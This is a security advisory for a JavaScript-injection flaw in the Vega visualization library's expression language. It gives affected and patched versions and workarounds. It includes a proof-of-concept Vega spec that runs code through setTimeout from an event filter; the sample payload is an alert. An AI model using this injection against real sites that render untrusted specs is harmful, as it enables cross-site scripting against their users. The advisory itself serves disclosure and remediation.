Impact
In vega 5.30.0 and lower, vega-functions 5.15.0 and lower , it was possible to call JavaScript functions from the Vega expression language that were not meant to be supported.
Patches
Patched in vega 5.31.0 / vega-functions 5.16.0
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
- Run
vega without vega.expressionInterpreter. This mode is not the default as it is slower.
- Using the interpreter described in CSP safe mode (Content Security Policy) prevents arbitrary Javascript from running, so users of this mode are not affected by this vulnerability.
References
- Reported to Vega-Lite by @kprevas Nov 8 2024 in https://github.com/vega/vega-lite/issues/9469 & https://github.com/vega/vega/issues/3984
Reproduction of the error in Vega by @mattijn
{
"$schema": "https://vega.github.io/schema/vega/v5.json",
"signals": [
{
"name": "inject_alert",
"on": [
{
"events": [
{
"type": "mousedown",
"marktype": "rect",
"filter": ["scale(event.view.setTimeout, 'alert(\"alert\")')"]
}
],
"update": "datum"
}
]
}
],
"marks": [
{
"type": "rect",
"encode": {
"update": {
"x": {"value": 0},
"y": {"value": 0},
"width": {"value": 100},
"height": {"value": 100}
}
}
}
]
}
Miggo AI